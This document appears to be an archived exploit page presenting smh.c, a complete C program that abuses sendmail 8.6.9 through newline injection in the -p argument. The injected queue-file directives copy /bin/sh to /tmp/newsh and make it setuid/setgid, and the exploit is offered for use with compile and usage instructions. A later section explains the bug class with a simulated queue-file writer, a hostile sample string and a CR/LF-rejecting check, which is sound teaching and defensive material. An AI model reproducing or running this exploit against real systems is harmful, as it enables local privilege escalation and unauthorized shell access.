smh.c

This interesting little number gets you a bin-owned sh from sendmail 8.6.9.

Special thanx to RatFace for providing this code!



/* smh.c - Michael R. Widner - atreus (2/27/95)
 *
 * a quick hack to abuse sendmail 8.6.9 or whatever else is subject to this
 * hole.  It's really just a matter of passing newlines in arguments to
 * sendmail and getting the stuff into the queue files.  If we run this
 * locally with -odq we are guaranteed that it will be queued, rather than
 * processed immediately.  Wait for the queue to get processed automatically
 * or just run sendmail -q if you're impatient.
 *
 * usage: smh [ username [/path/to/sendmail]]
 *
 * It's worth noting that this is generally only good for getting bin.
 * sendmail still wants to process the sendmail.cf file, which contains
 * Ou1 and Og1 most of the time, limiting you to bin access.  Is there
 * a way around this?
 *
 * cc -o smh smh.c should do the trick.  This just creates a bin owned
 * mode 6777 copy of /bin/sh in /tmp called /tmp/newsh.  Note that on some
 * systems this is pretty much worthless, but you're smart enough to know
 * which systems those are.  Aren't you?
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int
main(int argc, char **argv)
{
        /* -odq defers delivery to the queue so the injected lines land in
         * the qf file; -p sets the "protocol" string, which is written to
         * the queue file verbatim, so each embedded newline becomes a new
         * queue-file directive (Croot, M mailers, R recipients) when the
         * queue is run.  argv is only dereferenced within argc. */
        execlp(argc > 2 ? argv[2] : "sendmail", "sendmail", "-odq", "-p",
            "ascii\n"
            "Croot\n"
            "Mprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\n"
            "Mlocal, P=/bin/sh, F=lsDFMeu, A=sh -c $u\n"
            "R<\"|/bin/cp /bin/sh /tmp/newsh\">\n"
            "R<\"|/bin/chmod 6777 /tmp/newsh\">\n"
            "$rascii ",
            argc > 1 ? argv[1] : "atreus", (char *)0);
        perror("execlp");       /* only reached if sendmail could not be run */
        return 1;
}
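The whole trick above is newline injection into a line-oriented control file: the value of one field (-p) is stored verbatim, and the reader later treats every line of the queue file as its own directive. The following is an added example, not code from the page or from sendmail, that simulates that bug class with a made-up one-letter-per-line format (qf_write_naive, qf_write_checked and qf_parse are hypothetical names, not sendmail's real queue-file code, and the sample value is constructed here). It shows the naive writer turning one field into three directives and the checked writer refusing the value outright; the same reject-CR/LF check is the generic defense for any field that ends up in a line-delimited file.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define QF_CAP 512              /* capacity of the simulated queue file */
#define MAX_DIRECTIVES 32

/* Naive writer: emits one "<code><value>\n" line, copying the value verbatim.
 * This mirrors a queue-file writer that trusts a field taken from argv. */
static int qf_write_naive(char *qf, size_t cap, char code, const char *value)
{
        int n = snprintf(qf, cap, "%c%s\n", code, value);
        return (n < 0 || (size_t)n >= cap) ? -1 : n;
}

/* Hardened writer: refuse any value carrying a line terminator, since a
 * newline inside a field would be read back as a separate directive. */
static int qf_write_checked(char *qf, size_t cap, char code, const char *value)
{
        if (strpbrk(value, "\r\n") != NULL)
                return -1;
        return qf_write_naive(qf, cap, code, value);
}

/* Reader: one directive per line, first character is the directive code.
 * Returns the number of directives and fills codes[] with their letters. */
static int qf_parse(const char *qf, char *codes, int max)
{
        int n = 0;
        const char *s = qf;
        while (*s != '\0' && n < max) {
                const char *nl = strchr(s, '\n');
                size_t len = nl ? (size_t)(nl - s) : strlen(s);
                if (len > 0)
                        codes[n++] = s[0];
                if (nl == NULL)
                        break;
                s = nl + 1;
        }
        return n;
}

/* Number of directives the reader sees after the naive writer stores
 * `value` as a 'P' (protocol) line.  1 means the value stayed one field. */
int naive_directive_count(const char *value)
{
        char qf[QF_CAP], codes[MAX_DIRECTIVES];
        if (qf_write_naive(qf, sizeof qf, 'P', value) < 0)
                return -1;
        return qf_parse(qf, codes, MAX_DIRECTIVES);
}

/* Code letter of the idx-th directive after a naive write, or 0 if absent. */
char naive_directive_code(const char *value, int idx)
{
        char qf[QF_CAP], codes[MAX_DIRECTIVES];
        int n;
        if (qf_write_naive(qf, sizeof qf, 'P', value) < 0)
                return 0;
        n = qf_parse(qf, codes, MAX_DIRECTIVES);
        return (idx >= 0 && idx < n) ? codes[idx] : 0;
}

/* Same count via the hardened writer; -1 means the value was rejected. */
int checked_directive_count(const char *value)
{
        char qf[QF_CAP], codes[MAX_DIRECTIVES];
        if (qf_write_checked(qf, sizeof qf, 'P', value) < 0)
                return -1;
        return qf_parse(qf, codes, MAX_DIRECTIVES);
}

int main(void)
{
        /* Constructed sample input, shaped like smh.c's -p argument. */
        const char *hostile = "ascii\nCroot\nR<\"|/bin/cp /bin/sh /tmp/newsh\">";
        const char *benign = "ascii";
        int i, n = naive_directive_count(hostile);

        printf("naive writer, benign value : %d directive(s)\n",
               naive_directive_count(benign));
        printf("naive writer, hostile value: %d directive(s):", n);
        for (i = 0; i < n; i++)
                printf(" %c", naive_directive_code(hostile, i));
        printf("\nchecked writer, hostile value: %d (rejected)\n",
               checked_directive_count(hostile));
        return 0;
}
```

Running it prints one directive for the benign value, three (P, C, R) for the hostile one under the naive writer, and -1 for the hostile value under the checked writer. Rejecting is the right call here rather than escaping: a queue-file format with no escape syntax has no safe way to represent a newline inside a field.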

